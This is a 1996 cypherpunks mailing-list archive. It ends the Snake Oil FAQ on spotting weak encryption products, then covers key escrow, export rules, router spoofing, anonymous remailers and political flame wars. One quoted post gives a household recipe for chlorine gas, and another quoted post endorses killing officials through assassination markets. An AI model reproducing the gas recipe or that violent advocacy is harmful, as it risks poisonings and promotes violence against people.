protecting your data. If the vendor does not feel confident that the method used can withstand years of scrutiny by the academic community, then you should be wary of trusting it. (Note that a vendor who specializes in the cryptography may have a proprietary algorithm which they'll show to others if they sign a non-disclosure agreement. If the vendor is well-reputed in the field, this can be an exception.) Beware of specially modified versions of well-known algorithms. This may intentionally or unintentionally weaken the cipher. The use of a trusted algorithm, if not with technical notes explaining the implementation (if not availability of the source code for the product) are a sign of good faith on the part of the vendor that you can take apart and test the implementation yourself. A common excuse for not disclosing how a program works is that "hackers might try to crack the program's security." While this may be a valid concern, it should be noted that such 'hackers' can reverse engineer the program to see how it works anyway. If the program is implemented properly and the algorithm is secure, this is not a problem. (If a hypothetical 'hacker' was able to get access you your system, access to encrypted data might be the least of your problems.) * Experienced Security Experts and Rave Reviews Beware of any product claiming that "experienced security experts" have analyzed it, but it won't say who (especially if the scheme has not been published in a reputable journal). Don't rely on reviews in newspapers, magazines or television shows, since they generally don't have cryptologists (celebrity hackers who know about telephone systems don't count) take the software apart for them. Just because the vendor is a well known company or the algorithm is patented doesn't make it secure either. * Unbreakability Some vendors will claim their software is "unbreakable". This is marketing hype, and a common sign of snake-oil. Avoid any vendor that makes unrealistic claims. No algorithm is unbreakable. Even the best algorithms are breakable using "brute force" (trying every possible key), but if the key size is large enough, this is impractical even with vast amounts of computing power. One-time pads are unbreakable, but they must be implemented perfectly, which is, at best, very difficult. See the next section for a more detailed discussion. * One-Time-Pads A vendor might claim the system uses a one-time-pad (OTP), which is theoretically unbreakable. That is, snake-oil sellers will try to capitalize on the known strength of a OTP. It is important to understand that any variation in the implementation means that it is not an OTP, and has nowhere near the security of an OTP. A OTP system is not an algorithm. It works by having a "pad" of random bits in the possession of both the sender and recipient. The message is encrypted using the next n bits in the pad as they key, where n is the number of bits in the message. After the bits are used from the pad, they're destroyed, and can never again be used. The bits in the pad must be truly random, generated using a real random source, such as specialized hardware, radioactive decay timings, etc., and not from an algorithm or cipher. Anything else is not a one-time-pad. The vendor may confuse random session keys or initialization vectors with OTPs. * Algorithm or product XXX is insecure Be wary of anything that makes claims that particular algorithms or other products are insecure without backing up those claims (or at least citing references to them). Sometimes attacks are theoretical or impractical (requiring special circumstances or massive computing power running for many years), and it's easy to confuse a layman by mentioning these. * Keys and Passwords The "key" and the "password" are often not the same thing. The "key" generally refers to the actual data used by the cipher, while the "password" refers to the word or phrase the user types in, which the software converts into the key (usually through a process called "hashing" or "key initialization"). The reason this is done is because the characters a user is likely to type in do not cover the full range of possible characters. (Such keys would be more redundant and easier for an attacker to guess.) By hashing a key can be made from an arbitrary password that covers the full range of possible keys. It also allows one to use longer words, or phrases and whole sentences as a "passphrase", which is more secure. Anything that restricts users' passwords to something like 10 or 16 or even 32 characters is foolish. If the actual "password" is the cipher's key (rather than hashing it into a key, as explained above), avoid it. If the vendor confuses the distinctions between bits, bytes and characters when discussing the key, avoid this product. Convenience is nice, but be wary of anything that sounds too easy to use. Avoid anything that lets anyone with your copy of the software to access files, data, etc. without having to use some sort of key or passphrase. Avoid anything that doesn't let you generate your own keys (ie, the vendor sends you a key in the mail, or it's embedded in the copy of the software you buy). Avoid anything by a vendor who does not seem to understand the difference between public-key (asymmetric) cryptography and private-key (symmetric) cryptography. * Lost keys and passwords If there's a third-party utility that can crack the software, avoid it. If the vendor claims it can recover lost passwords (without using a key-backup or escrow feature), avoid it. If there is a key-backup or escrow feature, are you in control of the backup, or does the vendor or someone else hold a copy of the key? * Exportable from the USA If the software is made in North America, can it be exported? If the answer is yes, chances are it's not very strong. Strong cryptography is considered munitions in terms of export from the United States, and requires approval from the State Department. Chances are if the software is exportable, the algorithm is weak or it is crackable (hence it was approved for export). If the vendor is unaware of export restrictions, avoid the software: the vendor is not familiar with the state of the art. Because of export restrictions, some legitimate (not-Snake Oil) products may have a freely exportable version for outside of the USA, which is different from a separate US/Canada-only distribution. Also note that just because software has made it outside of North America does not mean that it is exportable: sometimes a utility will be illegally exported and posted on an overseas site. Other Considerations Interface isn't everything: user-friendliness is an important factor, but if the product isn't secure then you're better off with something that is secure (if not as easy to use). No product is secure if it's not used properly. You can be the weakest link in the chain if you use a product carelessly. Do not trust any product to be foolproof, and be wary any product that claims it is. Contributors The following folks have contributed to this FAQ. Jeremey Barrett Jim Ray Robert Rothenburg Walking-Owl References 1. B. Schneier, Applied Cryptography, second edition, John Wiley & Sons, 1996 2. M. Blaze, W. Diffie, R. L. Rivest, B. Schneier, T. Shimomura, E. Thompson, M. Wiener, "Minimal Key Lengths for Symmetric Ciphers to Provide Adequate Commercial Security," available via ftp://ftp.research.att.com/dist/mab/keylength.ps ---------------------------------------------------------------------------- C Matthew Curtin Last modified: Mon Sep 16 09:51:41 EDT ---------------------------------------------------------------------- -- C Matthew Curtin MEGASOFT, INC Chief Scientist I speak only for myself. Don't whine to anyone but me about anything I say. Hacker Security Firewall Crypto PGP Privacy Unix Perl Java Internet Intranet cmcurtin at research.megasoft.com http://research.megasoft.com/people/cmcurtin/ From bdavis at thepoint.net Mon Sep 16 14:41:42 1996 From: bdavis at thepoint.net (Brian Davis) Date: Tue, 17 Sep 1996 05:41:42 +0800 Subject: The Living and the Dead In-Reply-To: <199609160416.VAA08027@mail.pacifier.com> Message-ID: On Sun, 15 Sep 1996, jim bell wrote: > .... > How would an AP-type system treat Robert McNamara? He'd be dead in a > second. To those who say, "What good would this do?" I respond: Anyone in ^^^^^^ Kind of kills the betting pool, doesn't it? EBD > the American government today who is considering an adventure which MIGHT > turn into another Vietnam should be deterred by the knowledge that sometime, > in 30 minutes or 30 years, he could be killed for what he did. Robert > McNamara, presumably, did what he did because he thought he'd never be > punished. The best way to deter future governmental abuse is to remind > these people that they _will_ be punished. > > Jim Bell > jimbell at pacifier.com > From ses at tipper.oit.unc.edu Mon Sep 16 14:43:35 1996 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Tue, 17 Sep 1996 05:43:35 +0800 Subject: SPL -- Suspicious Persons List In-Reply-To: <199609160558.WAA11070@dfw-ix6.ix.netcom.com> Message-ID: On Sun, 15 Sep 1996, Bill Stewart wrote: > > >I am on an SPL that is run by an organisation called the "Ecconomic > >League". It is an organisation run by the UK Conservative party > >which keeps lists of "unsafe" employees. Of course the list is > (Just because I don't believe in the concept of "corporate slavery" > doesn't mean I don't think corporations can be offensive. This sucks...) > Out of curiousity, I thought the UK had Data Privacy Laws or > some sort of Database Cops - does that not apply to applications like this? The Econmic league is not run by the UK Conservative party directly, in the same way that the Willie Horton ads were not run by the Bush campaign.. They escape the Data Protection Act by virtue of keeping all this information in filing cabinets (at least, they claim to.) Simon --- Cause maybe (maybe) | In my mind I'm going to Carolina you're gonna be the one that saves me | - back in Chapel Hill May 16th. And after all | Email address remains unchanged You're my firewall - | ........First in Usenet......... From weld at l0pht.com Mon Sep 16 16:32:08 1996 From: weld at l0pht.com (Weld Pond) Date: Tue, 17 Sep 1996 07:32:08 +0800 Subject: IBM Boosts Encryption Initiative Message-ID: http://www.pcweek.com/news/0916/16enc.html IBM will roll out several security initiatives next month that include a new way to build encryption into software and technology that could enable U.S. companies to export products with strong encryption algorithms. and uhhh... IBM also will introduce several "key-recovery" technologies that could enable businesses to export encrypted data or software beyond the current 40-bit limit--without breaking U.S. government restrictions and whoa... The sources also added that the technology may satisfy the requirement imposed by the U.S. government that it be able to access encrypted data on demand. Weld Pond - weld at l0pht.com - http://www.l0pht.com/~weld L 0 p h t H e a v y I n d u s t r i e s Technical archives for the people - Bio/Electro/Crypto/Radio From junger at pdj2-ra.F-REMOTE.CWRU.Edu Mon Sep 16 16:54:54 1996 From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger) Date: Tue, 17 Sep 1996 07:54:54 +0800 Subject: That Evil Internet, Pt. XXIII In-Reply-To: Message-ID: <199609161708.NAA26581@pdj2-ra.F-REMOTE.CWRU.Edu> snow writes: : : WARNING: DANGEROUS. : : Simple advice for the manufacture of Chlorine Gas (similar enough to : mustard gas that it has the same effect). : : 1 bottle of Chlorine Bleach. : 1 Bottle of lime-away. : : Hold Breath, mix in open container. Clear the building before you breath : e : again. : : Use more bottles for a larger area. : : I did this accidentally when I was young (16), foolish and working : for a hospital. That it happened at work (_very_ small amounts of both bleach : and lime-away) made the Emergency Room visit free and quick. No permanent : damage, but I was lucky. : Or one can use the technique my father accidentally discovered when he was in school and wanted to electrolyze water. He made himself a cell out of a broken light bulb (and wired it in series with a good light bulb) and then realized that he did not have any sulphuric acid lying around to use as a catalyst. So he used table salt instead. -- Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu URL: http://samsara.law.cwru.edu From dlv at bwalk.dm.com Mon Sep 16 16:58:52 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 17 Sep 1996 07:58:52 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <9608168428.AA842891743@smtplink.alis.ca> Message-ID: jbugden at smtplink.alis.ca writes: > dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) wrote: > >Starting with the lying old fart himself. > > You shouldn't be so hard on Tim. I tried giving up farting years ago but I = > found > I gained a lot of weight. It's also become more socially acceptable as evid= I wonder why containing one's fart would cause one to gain weight. Volume maybe, but I'd think that gas weight about as much as the air it displaces. Cheers, --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From merriman at amaonline.com Mon Sep 16 17:05:43 1996 From: merriman at amaonline.com (David K. Merriman) Date: Tue, 17 Sep 1996 08:05:43 +0800 Subject: Snake Oil FAQ 0.4 [comments appreciated] Message-ID: <199609161705.KAA26825@toad.com> -----BEGIN PGP SIGNED MESSAGE----- To: cypherpunks at toad.com Date: Mon Sep 16 12:05:17 1996 > (First off, I'd like to thank Matt for doing this.) > > The key length stuff is good, but a common component of snake oil is > that it claims to have very long key sizes. > > | Some ciphers, while currently secure against most attacks, are not > | considered viable in the next few years because of relatively small > keysizes > | and increasing processor speeds (making a brute-force attacks > feasible). The > | tables below should give some general guidelines for making intelligent > | decisions about the key length you need. If the key is too short, the > system > | will be easily broken, even if the cipher is a good one. > | > | In [1] and [2], we're presented with some guidelines for deciding > | appropriate key length. (It is important to note that this is based on > the > | ability to predict computing power 40, 65, and 100 years from now. > Major > | breakthroughs in computing power 30 years from now might render > everything > | on this chart kiddieplay.) > > | * One-Time-Pads > | > | A vendor might claim the system uses a one-time-pad (OTP), which > is > | theoretically unbreakable. That is, snake-oil sellers will try > to > | capitalize on the known strength of a OTP. It is important to > | understand that any variation in the implementation means that it > is > | not an OTP, and has nowhere near the security of an OTP. > | > | A OTP system is not an algorithm. It works by having a "pad" of > random > | bits in the possession of both the sender and recipient. The > message is > | encrypted using the next n bits in the pad as they key, where n > is the > | number of bits in the message. After the bits are used from the > pad, > | they're destroyed, and can never again be used. The bits in the > pad > | must be truly random, generated using a real random source, such > as > | specialized hardware, radioactive decay timings, etc., and not > from an > | algorithm or cipher. Anything else is not a one-time-pad. > > The phrase easy-to-use should not appear in proximity to one > time pad, except in the context 'Easier key management than a one time > pad!" > I would also suggest that the generation of OTP 'pads' for users is *highly* questionable. Who else is getting a copy of them, assuming they're even valid? Dave Merriman - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- PGP Email welcome, encouraged, and PREFERRED. Visit my web site at http://www.shellback.com/p/merriman for my PGP key and fingerprint "What is the sound of one hand clapping in a forest with no one there to hear it?" I use Pronto Secure (tm) PGP-fluent Email software for Windows -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMjzSBMVrTvyYOzAZAQGVwQP+N6vjyniDH0ad3G8dWu1cPHi5yfvksbS7 EJmgpSVTlaLf1Kp7rX2zBULxKvd2bqN3z3tAhj6reeG8la+P3Skw9gPJS8ggYvOn cXwdRsCyRICgHYMcbaEB/91YsJMweYyzWLe2JZazs3NfsafxdNKerGR7kvoQF0bG oBNR169sGlo= =WqlN -----END PGP SIGNATURE----- From unicorn at schloss.li Mon Sep 16 17:14:41 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 17 Sep 1996 08:14:41 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <199609160537.HAA26159@basement.replay.com> Message-ID: On Mon, 16 Sep 1996, Anonymous wrote: > Tim May wrote: > > > The thing about _traditional_ charity, of the religious or community sort, > > was that it was not treated as an "entitlement," as something the resentful > > masses could "demand" as part of their "human rights." > > There's no substantial difference between their resentful whining about > their rights Such as the "right" to health insurance, the "right" to free checks for sitting on one's chair, the "right" to be treated preferentially as equally qualified non-minorities applying to the same job, the "right" to housing, the "right" to free education, the "right" to be paid three times what your labor is worth in the lowest bracket jobs. > and your resentful whining about your rights The right to personal property. Beginning to get the picture? All of the former were created in the last 60 years out of whole cloth more as "revolution insurance" than anything else. They are rights because someone said they were, not because they are well or logically grounded. > - except maybe that you whine more. I should hope he does. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 16 18:15:03 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Tue, 17 Sep 1996 09:15:03 +0800 Subject: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL Message-ID: <01I9JR9M8PLC8Y4X3Y@mbcl.rutgers.edu> From: IN%"gnu at toad.com" "John Gilmore" 16-SEP-1996 10:13:36.24 >While you are at it, you could move just the censored material to a >separate IP address from the rest of the archives, and issue Web >redirects for requests sent to the old address. In fact it might be >interesting to redirect readers to various mirror sites automatically, >at random and in rotation. Thus, when someone connects to your web >site to read censored material, they will be automatically redirected >to one of dozens or hundreds of other places where the material can be >found. The German censors will likely find it impossible to block >access to all those sites (and each such site can also be changing its >IP address periodically). The first part (redirection at random) can be done via a CGI script; this may be useful for those wishing to put in links to a mirror site without having to choose a particular one or host it themselves. Incidentally, speaking of mirror sites, I'd be interested in locating scripts to do the following: A. Automatically redirect someone to an appropriate mirror site based upon closeness to their originating IP address B. Automatically poll (via crontab or similar mechanisms) between mirror sites (and to the anonymizer) to see if they're up, using the first part to redirect accordingly. -Allen From dlv at bwalk.dm.com Mon Sep 16 18:16:35 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 17 Sep 1996 09:16:35 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: Message-ID: <4R4cuD3w165w@bwalk.dm.com> tcmay at got.net (Timothy C. May) writes: > I have never argued against insurance! People who wish to buy insurance are > welcome to, obviously. Tim doesn't understand the difference between a private insurance participation in which is voluntary (most life insurance in the U.S., most retirement savings plans) and a government-mandated scam like Social Security. I fart in your general direction. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From declan at well.com Mon Sep 16 18:22:01 1996 From: declan at well.com (Declan McCullagh) Date: Tue, 17 Sep 1996 09:22:01 +0800 Subject: IBM_gak Message-ID: > 9-13-96. BuWi: > > "Revolutionary Intranet security product to be > demonstrated at Interop DotCom " > > DSN's NetFortress fully automates hardware-based > authentication, encryption and key exchange into a > plug and play solution. It completely eliminates the > possibility of IP spoofing, eavesdropping and > break-ins. "After installing it, I couldn't even tell > which service a given packet was from - everything but > the packet header itself was rendered undecipherable > as it traversed the Internet." DSN Technology was > founded by Dr. Aharon Friedman and Andy Savas. Thanks, John, for forwarding. I spoke with the DSN folks today. They developed NetFortress in the U.S. and have recently found a substantial overseas market for it. "That's definitely a problem for us. We're actively lobbying senators to pass procode, to get it out of committee." Since of course multinationals would be unwilling to use DSN stuff under current export-control regime. -Declan From dlv at bwalk.dm.com Mon Sep 16 18:28:28 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 17 Sep 1996 09:28:28 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <323D6B95.7BC9@tivoli.com> Message-ID: Mike McNally writes: > jbugden at smtplink.alis.ca wrote: > > > > > A social safety net is simply a form of health and life > insurance. > > And a really neat-o form it is, too! All it takes is an armed force > to coerce the unwilling into paying the premiums of those who don't > pay their own. Yeah, and Social Security is a retiremend fund. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From craigw at dg.ce.com.au Mon Sep 16 18:32:46 1996 From: craigw at dg.ce.com.au (craigw at dg.ce.com.au) Date: Tue, 17 Sep 1996 09:32:46 +0800 Subject: 56 kbps modems Message-ID: <199609162239.IAA24591@mac.ce.com.au> That I realize that baud and bit/sec are not the same, but I feel you would have a hard time getting a 56k modem to work on a line that does not support 28.8k fully, let alone 33.6k. A leased line (copper pair) from telstra only supports 9.6k and costs close to ISDN. When the telco reinstalls the literal tons of copper cable that we have lying underground for at least 20 years in some instances that connects the exchanges, and replaces this with optic fibre preferably, or at least higher bandwidth co-ax, we will not have 28k even. In the states you have better lines and ISDN is far less expensive. For two B channels perminantly connected I have to pay about $2500/month in this country. Not many home users can pay this, thus they have to still use modems. With the lack of bandwidth to and from the exchanges, there is not a chance in hell a 56k modem will work in this country for many years. (Australia - the lucky country...not in regards to bandwidth) > As I am sure has been discussed at length before, baud does not equal > bps. AFAIK, V32bis is only 2400baud. ,'~``. \|/ ,'``~. (-o=o-) (@ @) ,(-o=o-), +--.oooO--(_)--Ooo-----oOO-(_)-OOo-------oooO--(_)--Oooo.------+ | | | Soon, we may all be staring at our computers, wondering | | whether they're staring back. | | | | [Network Admin For WPA Business Products. aka doshai >;-) ] | | .oooO http://pip.com.au/~doshai/ Oooo. | | ( ) Oooo. .oooO ( ) | +-----\ (----( )-------oooO-Oooo--------( )--- ) /---------+ \_) ) / \ ( (_/ (_/ \_) Key fingerprint = 2D F4 54 BB B4 EA F1 E7 B6 DE 48 92 FC 8D FF 49 Send a message with the subject "send pgp-key" for a copy of my key. (if I want to give it to you) From dlv at bwalk.dm.com Mon Sep 16 18:39:59 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 17 Sep 1996 09:39:59 +0800 Subject: IBM_gak In-Reply-To: Message-ID: Lucky Green writes: > Aparently, Al Gore's recent phone calls to everybody who is anybody in the > industry have paid off. After HP, TIS, and other unnamed parties, now IBM > is supporting GAK. Folks, this battle is lost. Domestic GAK is coming to > a PKI near you. Apparently, senile Tim May (fart) is a Clinton administration troll planted here to sabotage any discussions of actual crypto work and to flood this mailing list with lies and personal attacks and to make it unusable. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From smith at sctc.com Mon Sep 16 18:41:27 1996 From: smith at sctc.com (Rick Smith) Date: Tue, 17 Sep 1996 09:41:27 +0800 Subject: Workers Paradise. /Political rant. Message-ID: <199609162224.RAA12536@shade.sctc.com> Asgaard wrote: : .... But suppose the population problem could : be fixed. Then, with technology escalating towards singularity, : machines doing almost all labor, there could certainly exist a : system where the 'dumb' and 'lazy' could be fed and housed properly : without anybody complaining. I'm always fascinated when people trot out this notion of technology giving us a maintenance free world that provides all our needs. Like Rifkin's "End of Work." I'm sorry but I just don't see how the problems of food and shelter are solved simply because we've automated the production of bank statements. All the really effective automation has involved symbolic activities, not the basic stuff of life, like food and shelter. : P.S. Mac Donalds could easily be replaced by a bot. Very unlikely. Despite the incredible degree of mechanization that happens in food production, *most* of it requires people in the loop. Part of it is health concerns -- you're far more likely to poison a significant portion of the population if you don't keep active human involvement in food production. But there's also a lot having to do with the structure of the work. You *can't* send a robot tractor into the fields and expect it to treat your corn right. And milking machines, well .... I did a lot with fault tolerance and industrial robotics in a previous life. Robots work fine in highly structured environments. Their value decreases dramatically as you remove structure. In unstructured environments they're either useless or just plain dangerous. Even the so called "industrialized" farms are wildly unstructured compared to a factory floor. And there's little reason to assume that 'biological units' (plants and animals produced for food) in a fully structured factory-like setting will yield all the products necessary for an adequate food supply. It seems that whenever we develop a "complete" model of what people need to survive and subject a few people to it, we discover that something fatal has been left out. : But to force people into menial service jobs just to literally : survive is not to my taste. No, give them minimal shelter for : nothing and from there on let the market anarcho-capitalistic : struggle begin, for obtaining a higher than minimum material : standard or reputational standing. I suspect that the Real World will always require a large portion of the available labor pool to do work that supports the production of food and shelter. The support has gotten pretty indirect in modern industrialized countries, I admit. Rick. smith at sctc.com From stewarts at ix.netcom.com Mon Sep 16 18:41:57 1996 From: stewarts at ix.netcom.com (stewarts at ix.netcom.com) Date: Tue, 17 Sep 1996 09:41:57 +0800 Subject: HipCrime as MetaSPAM Message-ID: <199609161835.OAA01055@attrh1.attrh.att.com> The Hippie Of Crime also asked that remailer operators not block HipCrime SPAM deliveries and all mail to HipCrime because people might be interested in his cool fractals and Java neural net lotto-predicters and anarchist pages. If he wants to advertise to people about his other cool products, he doesn't need to do it anonymously. Furthermore, he doesn't provide any method in his web pages for users to anonymously request information, or to have information delivered anonymously. So blocking him from the remailers won't lose him anything. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From markm at voicenet.com Mon Sep 16 18:42:02 1996 From: markm at voicenet.com (Mark M.) Date: Tue, 17 Sep 1996 09:42:02 +0800 Subject: J'accuse!: Whitehouse and NSA vs. Panix and VTW In-Reply-To: <2.2.32.19960916190033.010773d0@vertexgroup.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Mon, 16 Sep 1996, John F. Fricker wrote: > Well IPSec provides for authentication of endpoints which would identify the > syn attacker. > > What amazes me is that routers happily pass packets with foreign IP return > addresses. I guess there is some valid utility to being able to originate a > connection that actually goes somewhere else for intiating a many to many > protocol. But I can't think of any practical application that would > necessarily be that way. > > So why do routers let packets leave local networks that do not appear to > originate from said local network? Doesn't routing work "both ways" so to speak? Probably the same reason that most routers let packets claiming to be from the local net through. Even those that do filter packets claiming to be from the local net don't have any real reason to block packets claiming to be from foreign addresses -- the administrators don't have anything to gain. It'll probably take some time before this is considered standard netiquette. - -- Mark PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMj3WtizIPc7jvyFpAQFIaQf+LFurdJzTgysANF8KNutVkYPR/29jHHON Vf+2SBn71AYhuBbkwAuAyCr+MyI7T0+Cct6sDq/F6FotiI8fUid2HKmcvfdSBl7l dRdKRfeNVKrbwggx8cg+smgWlx47zmMKNYa5RO1q53xwKHUBrLjEB+FzpLXryAbJ 5fbg/0ujnqPejHDBdjeDGyebzE6FOr/2qjCpGZb9CU+2Df35VJde5sNuObLo/H1q mM70vPMsMzSiRkSzDTtnsJZJumOqMP92Q3KSSwtOre5D7Fxg9g9anpTxYmYQhBEs SqyKMOTluFUh1Uq+8cizqZ+zzc89cnM1+vUJKRe4TxvNxMY0JJ7CWQ== =yYoB -----END PGP SIGNATURE----- From liberty at gate.net Mon Sep 16 18:46:05 1996 From: liberty at gate.net (Jim Ray) Date: Tue, 17 Sep 1996 09:46:05 +0800 Subject: Judge Kozinski Responds Message-ID: <199609162121.RAA24934@osceola.gate.net> -----BEGIN PGP SIGNED MESSAGE----- Mime-Version: 1.0 Content-Type: text/plain Content-Transfer-Encoding: 7bit To: cypherpunks at toad.com Date: Mon Sep 16 17:18:36 1996 cypherpunks: I have been having a private e-mail conversation with Judge Alex Kozinski of the 9th circuit. Today he said: >Jim: Feel free to clarify my position to your comrades >(excuse the term) if you think it will be useful. I guess >I'll keep thinking about this stuff and may change my mind >on some things. ... In a previous message to me in response to cypherpunks messages mentioning him which I forwarded, he said: >The statement about anonymous remailers was largely >accurate. I'm not sure that the fact that you (or some of >your associates) are willing to block people from getting >anonymous mail is a sufficient safeguard. Some may not be, >and it only takes one or two who do not adhere to the code >to make life miserable for the rest of us. > >We agree about the need for privacy, but I'm not at all sure >why the right to send messages anonymously trumps the >recipient's right to know who's addressing him. Getting an >anonymous message--even one that is not harassing or >threatening--is an invasion of my privacy. As for Me: [Please note, this statement caused me to block his address from WinSock messages, but _NO_ I will not give you his e-mail address, so please do not ask me to unless I _know_ you are a remailer-operator, and you send me a PGPmessage including your key and asking for it for blocking reasons ONLY. So far, nobody has been stupid enough to try to use the remailers to harass him. I DON'T want this man harassed, and having him understand "our" point of view will be a "big cypherpunk win"(tm) IMNSHO, so please trust me to represent you fairly. Thanks.] On with the Judge: >Halloween, it only really works when the people dressed up >are about four feet tall. In the rare instances where there >have been adults at my door that were so disguised you >couldn't tell who they were, I felt threatened--kept my >Glock handy before opening door. > >The quote about morphed children's images was sort of >botched, as was my assessment of the Third Circuit's case. >What I said about children is that morphed images did not >involve normal exploitation of children so it would not >clearly fall in the unprotected category, but that there may >be other harms I'd have to think about before deciding. >As for the Third Circuit's opinion, I said at the outset >they got it right in the bottom line; what I criticized was >their use of analogies to deal with the problem. I find >that much thinking about the net is analogy-driven and that >analogies are inherently imprecise and can be misleading. > >Anyway, thanx for bearing with me. There's a lot of this >stuff I have not made up my mind about and I find talking >about it helps shape my thinking. Folks, we have a chance to win or lose, depending on list.maturity and common sense. If this man is harassed, convincing him will become harder for me, and I will be very annoyed. If you make a coherent comment that covers ground that I have not already covered with him, I will forward it on to him. Alex Kozinski is IMO, by far, the closest thing to a libertarian that Reagan ever appointed, and in both messages he has mentioned having an open mind. Let's try not to give him a reason to close it. Thanks for trusting me, and thanks in advance for behaving nicely and respecting the judge's privacy. JMR Regards, Jim Ray -- DNRC Minister of Encryption Advocacy "As govt.s grow arithmetically, corruption grows exponentially." -- Ray's Law of official corruption. Defeat the Duopoly! Stop the Browne out. Harry Browne for President. Jo Jorgensen for Vice-president. http://www.HarryBrowne96.org/ http://www.twr.com/stbo ___________________________________________________________________ PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE 53 2D 9C A1 B3 50 C9 C8 I will generate a new (and bigger) PGP key-pair on election night. http://www.shopmiami.com/prs/jimray ___________________________________________________________________ -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBMj3ENG1lp8bpvW01AQEOBAP+IExjfTO6DnrBvF8/xNFWLDcYTgIid5tI Gpya0oRKRFIgYm2v3pjw2y649QxC8bGryy15wi72s6p4f1Sf6pqKbOz6ANcHNkOK JoenVAMBxKK4wwoDIzqkxPBBIBmQO/KzJBw5ymfhGMZNN+NN6nwS9JnlSKeDwFtO 94BZLZ2fec4= =IS+5 -----END PGP SIGNATURE----- From dlv at bwalk.dm.com Mon Sep 16 18:46:12 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 17 Sep 1996 09:46:12 +0800 Subject: Workers Paradise. /Political rant. In-Reply-To: <199609161427.QAA05854@basement.replay.com> Message-ID: <8L4cuD2w165w@bwalk.dm.com> nobody at replay.com (Anonymous) writes: > Tim is not productive. He *was* productive, but not anymore; his wealth Tim has no life. That's why he posts lies, personal attacks, and flame bait to this mailing list and drives away and and all crypto discussion. > > In most societies this is considered the difference between a child and > > an adult... > > This is a silly statement of the kind often made by people who have no > solid grasp of history or social organization: most societies that > radically differ from our own in their ways of maintaining/supervising > their members (successful or not) have apparatuses so invasive and > arbitrary that, in comparison, the IRS and assorted other bureaucracies > look pretty benign. Yes - he's a typical mediocre product of the U.S. public education system. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From editor at cdt.org Mon Sep 16 18:46:57 1996 From: editor at cdt.org (Bob Palacios) Date: Tue, 17 Sep 1996 09:46:57 +0800 Subject: CDT Policy Post 2.31 - Join Rep. Eshoo Online, Tues. 9/16, 8:00 EDT Message-ID: ----------------------------------------------------------------------------- _____ _____ _______ / ____| __ \__ __| ____ ___ ____ __ | | | | | | | | / __ \____ / (_)______ __ / __ \____ _____/ /_ | | | | | | | | / /_/ / __ \/ / / ___/ / / / / /_/ / __ \/ ___/ __/ | |____| |__| | | | / ____/ /_/ / / / /__/ /_/ / / ____/ /_/ (__ ) /_ \_____|_____/ |_| /_/ \____/_/_/\___/\__, / /_/ \____/____/\__/ The Center for Democracy and Technology /____/ Volume 2, Number 31 ---------------------------------------------------------------------------- A briefing on public policy issues affecting civil liberties online ---------------------------------------------------------------------------- CDT POLICY POST Volume 2, Number 31 September 16, 1996 CONTENTS: (1) Join Rep. Anna Eshoo (D-CA) Live Online Tuesday Sept 17, 8:00 pm EDT (2) How to Subscribe/Unsubscribe (3) About CDT, contacting us ** This document may be redistributed freely with this banner intact ** Excerpts may be re-posted with permission of ** This document looks best when viewed in COURIER font ** ----------------------------------------------------------------------------- (1) Join Rep. Anna Eshoo (D-CA) Live Online Tuesday Sept 17, 8:00 pm EDT Representative Anna Eshoo (D-CA) will be live online on Tuesday September 17 at 8:00 pm EDT (5:00 pm PDT) to discuss her efforts bring privacy and security to the Internet through the reform of US encryption policy. Eshoo will also take questions from Netizens during the discussion. Representative Eshoo, who represents the heart of California's Silicon Valley, is a co-sponsor of HR 3011, the "Security and Freedom through Encryption (SAFE) Act of 1996", a founding member of the Congressional Internet Caucus, and a strong advocate for enlightened Internet policies. Momentum in Congress for real reform of US encryption policy remains strong. The House Judiciary Committee is scheduled to hold a hearing on HR 3011 on Wednesday September 25, 1996, and the Senate Commerce Committee is expected to vote on the Burns/Leahy "Pro-CODE" bill (S. 1726) soon. DETAILS ON HOW TO PARTICIPATE IN THE DISCUSSION: At 8:00 pm EDT (5:00 pm PDT), point your browser to: http://www.hotwired.com/wiredside/ To participate you will need to have RealAudio installed on your computer (available free at http://www.realaudio.com/). 